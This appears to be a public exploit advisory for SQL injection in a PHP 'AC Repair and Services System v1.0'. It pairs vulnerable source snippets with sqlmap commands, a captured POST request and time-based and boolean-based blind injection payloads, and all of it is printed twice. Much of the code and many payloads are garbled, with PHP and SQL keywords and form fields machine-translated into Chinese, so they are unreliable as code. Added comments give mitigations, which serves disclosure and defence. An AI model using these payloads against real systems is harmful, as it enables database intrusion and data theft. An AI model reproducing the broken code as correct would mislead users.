# Exploit Title: AC Repair and Services System v1.0 - Multiple SQL Injection
# Date: 2023-12-27
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/...ysql-source-code-code-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/php-acrss.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Source code (/php-acrss/admin/user/manage_user.php):
php
// NOTE: this snippet is garbled by machine translation (`$ _ get` is $_GET, `从`
// stands for FROM, `为` for `as`); the control flow is still readable.
// Reads the `id` query-string parameter and interpolates it, unvalidated and
// unescaped, straight into the SELECT string handed to $conn->query() — this is
// the injection point the sqlmap run below reports (GET `id`, time-based blind).
// Mitigation: validate/cast the id and bind it through a prepared statement
// (prepare('... WHERE id = ?') + bind_param) instead of string interpolation.
// Detection: a quote character or SLEEP()/BENCHMARK() in this endpoint's `id`
// parameter is a high-signal indicator in access logs / WAF telemetry.
if(isset($ _ get ['id'])){
$ user=$ conn-Query('select *从用户中的id='{$ _ get ['id']}'');
// The query result is never checked: with a mysqli-style $conn (suggested by
// fetch_array()) a failed query yields false and the call below would itself
// error — presumably, confirm against the driver in use.
foreach($ user-fetch_array()为$ k=$ v){
// Every column of the matched row is copied into $meta by column name.
$ meta [$ k]=$ v;
}
}
?
-sqlmap -u'http://localhost/php -acrss/admin/?page=user/manage_userid=' - batch
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
payload: page=user/manage_userid='and(从(select(Sleep(5))hicz选择5500)和'rzis'='rzis
---
Source code (/php-acrss/classes/master.php):
// delete_inquiry(): deletes one inquiry row identified by the POST `id` field
// and returns a JSON status document.
// NOTE: garbled rendering — `函数` is `function`, `提取` is extract(), `别的` is
// `else`, `返回` is `return`; the DELETE string is cut off after FROM in this copy
// of the page, so the rest of the query is not visible here.
// extract($_POST) turns every submitted field into a local variable, so $id (and
// any other name the client chooses) is attacker-controlled and reaches the query
// without validation — the injection sqlmap reports below (custom POST `id`,
// time-based blind).
// Mitigation: do not extract() request data; read $_POST['id'], validate it as an
// integer and bind it in a prepared DELETE.
函数delete_inquiry(){
提取($ _ post);
$ del=$ this-conn-Query('delete fref从
如果($ del){
$ resp ['status']='成功';
$ this-settings-set_flashdata('成功','询问成功删除。');
}别的{
$ resp ['status']='失败';
// The raw driver error text is returned to the client in the JSON body; this is
// an information-disclosure issue on its own and should be replaced by a generic
// message with the detail written to the server log.
$ resp ['error']=$ this-conn-error;
}
返回JSON_ENCODE($ resp);
}
-sqlmap -u'http://localhost/php -acrss/class/class/master.php?f=delete_inquiry' - data='id=*' - batch
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
PAYLOAD: ID='和(Select 7930从(Select(Sleep(5)))XWLG)和'jimw'='jimw
---
Source code (/php-acrss/classes/users.php):
// Fragment of the users.php save routine: the enclosing method starts and ends
// outside what is shown, and the line that appends each POST key/value pair to
// $data is missing from this rendering (only the comma-separator logic survives),
// so the statement order shown here is not the real one.
// Two untrusted values reach the UPDATE unescaped: $data, presumably assembled
// from the POST fields iterated below (confirm against the full file), and $id,
// which is interpolated unquoted into the WHERE clause — the multipart `id`
// injection sqlmap reports below (boolean- and time-based blind).
// Mitigation: whitelist the updatable columns, build `col = ?` placeholders and
// bind the values, and cast $id to int before use.
$ qry=$ this-conn-Query('Update用户设置$ data WHEW id={$ id}');
如果($ qry){
$ this-settings-set_flashdata('Success',“用户详细信息成功更新”);
// Every POST field except `id` is iterated; when the edited account is the
// current session's user, each submitted field is also copied into the session
// via set_userdata(). NOTE(review): copying every client-supplied key into the
// session is broader than needed — restrict this to the fields the session
// actually uses; what the copied values influence depends on code not shown.
foreach($ _ post as $ k=$ v){
如果($ k!='id'){
if(!empty($ data))$ data。=',';
if($ this-settings-userdata('id')==$ id)
$ this-settings-set_userdata($ k,$ v);
}
}
POST /php-acrss/classes/users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 943
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAutgvsswijifz27g
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-acrss/admin/?page=user/manage_user&id=9
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=O92N8NATI3696KG69PLIDV5E77
Connection: close
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='id'
9
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='firstName'
克莱尔
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data; name='middlename'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='lastname'
布雷克
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='用户名'
cblake
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='密码'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='类型'
2
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryautgvsswijifz27g--
-sqlmap -r〜/documents/post -localhost.txt -batch
---
Parameter: MULTIPART id ((custom) POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
PAYLOAD: ----------- webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='id'
(选择(当(3947=3947)的情况下,然后9 else(选择2252 UNION SELECT 2638)END))))
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='firstName'
克莱尔
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data; name='middlename'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='lastname'
布雷克
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='用户名'
cblake
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='密码'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='类型'
2
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryautgvsswijifz27g--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
PAYLOAD: ----------- webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='id'
9和(从(select(sleep(5)))pifo中选择7168)
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='firstName'
克莱尔
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data; name='middlename'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='lastname'
布雷克
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='用户名'
cblake
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='密码'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='类型'
2
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryautgvsswijifz27g--
---
# Date: 2023-12-27
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/...ysql-source-code-code-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/php-acrss.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Source code (/php-acrss/admin/user/manage_user.php):
php
// NOTE: this snippet is garbled by machine translation (`$ _ get` is $_GET, `从`
// stands for FROM, `为` for `as`); the control flow is still readable.
// Reads the `id` query-string parameter and interpolates it, unvalidated and
// unescaped, straight into the SELECT string handed to $conn->query() — this is
// the injection point the sqlmap run below reports (GET `id`, time-based blind).
// Mitigation: validate/cast the id and bind it through a prepared statement
// (prepare('... WHERE id = ?') + bind_param) instead of string interpolation.
// Detection: a quote character or SLEEP()/BENCHMARK() in this endpoint's `id`
// parameter is a high-signal indicator in access logs / WAF telemetry.
if(isset($ _ get ['id'])){
$ user=$ conn-Query('select *从用户中的id='{$ _ get ['id']}'');
// The query result is never checked: with a mysqli-style $conn (suggested by
// fetch_array()) a failed query yields false and the call below would itself
// error — presumably, confirm against the driver in use.
foreach($ user-fetch_array()为$ k=$ v){
// Every column of the matched row is copied into $meta by column name.
$ meta [$ k]=$ v;
}
}
?
-sqlmap -u'http://localhost/php -acrss/admin/?page=user/manage_userid=' - batch
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
payload: page=user/manage_userid='and(从(select(Sleep(5))hicz选择5500)和'rzis'='rzis
---
Source code (/php-acrss/classes/master.php):
// delete_inquiry(): deletes one row of the inquiry table (rendered here as
// `iqueiry_list`, presumably `inquiry_list`) whose id matches the POST `id`
// field, then returns a JSON status document.
// NOTE: garbled rendering — `函数` is `function`, `提取` is extract(), `别的` is
// `else`, `返回` is `return`, and the `if` has been fused onto the end of the
// query line.
// extract($_POST) turns every submitted field into a local variable, so $id (and
// any other name the client chooses) is attacker-controlled and reaches the
// quoted WHERE clause without validation — the injection sqlmap reports below
// (custom POST `id`, time-based blind).
// Mitigation: do not extract() request data; read $_POST['id'], validate it as an
// integer and bind it in a prepared DELETE.
函数delete_inquiry(){
提取($ _ post);
$ del=$ this-conn-Query('delete fref从
iqueiry_list
whene id='{$ id}'');如果($ del){
$ resp ['status']='成功';
$ this-settings-set_flashdata('成功','询问成功删除。');
}别的{
$ resp ['status']='失败';
// The raw driver error text is returned to the client in the JSON body; this is
// an information-disclosure issue on its own and should be replaced by a generic
// message with the detail written to the server log.
$ resp ['error']=$ this-conn-error;
}
返回JSON_ENCODE($ resp);
}
-sqlmap -u'http://localhost/php -acrss/class/class/master.php?f=delete_inquiry' - data='id=*' - batch
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
PAYLOAD: ID='和(Select 7930从(Select(Sleep(5)))XWLG)和'jimw'='jimw
---
Source code (/php-acrss/classes/users.php):
// Fragment of the users.php save routine: the enclosing method starts and ends
// outside what is shown, and the line that appends each POST key/value pair to
// $data is missing from this rendering (only the comma-separator logic survives),
// so the statement order shown here is not the real one.
// Two untrusted values reach the UPDATE unescaped: $data, presumably assembled
// from the POST fields iterated below (confirm against the full file), and $id,
// which is interpolated unquoted into the WHERE clause — the multipart `id`
// injection sqlmap reports below (boolean- and time-based blind).
// Mitigation: whitelist the updatable columns, build `col = ?` placeholders and
// bind the values, and cast $id to int before use.
$ qry=$ this-conn-Query('Update用户设置$ data WHEW id={$ id}');
如果($ qry){
$ this-settings-set_flashdata('Success',“用户详细信息成功更新”);
// Every POST field except `id` is iterated; when the edited account is the
// current session's user, each submitted field is also copied into the session
// via set_userdata(). NOTE(review): copying every client-supplied key into the
// session is broader than needed — restrict this to the fields the session
// actually uses; what the copied values influence depends on code not shown.
foreach($ _ post as $ k=$ v){
如果($ k!='id'){
if(!empty($ data))$ data。=',';
if($ this-settings-userdata('id')==$ id)
$ this-settings-set_userdata($ k,$ v);
}
}
POST /php-acrss/classes/users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 943
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAutgvsswijifz27g
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-acrss/admin/?page=user/manage_user&id=9
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=O92N8NATI3696KG69PLIDV5E77
Connection: close
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='id'
9
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='firstName'
克莱尔
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data; name='middlename'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='lastname'
布雷克
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='用户名'
cblake
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='密码'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='类型'
2
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryautgvsswijifz27g--
-sqlmap -r〜/documents/post -localhost.txt -batch
---
Parameter: MULTIPART id ((custom) POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
PAYLOAD: ----------- webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='id'
(选择(当(3947=3947)的情况下,然后9 else(选择2252 UNION SELECT 2638)END))))
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='firstName'
克莱尔
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data; name='middlename'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='lastname'
布雷克
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='用户名'
cblake
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='密码'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='类型'
2
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryautgvsswijifz27g--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
PAYLOAD: ----------- webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='id'
9和(从(select(sleep(5)))pifo中选择7168)
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='firstName'
克莱尔
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data; name='middlename'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='lastname'
布雷克
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='用户名'
cblake
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='密码'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='类型'
2
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryautgvsswijifz27g--
---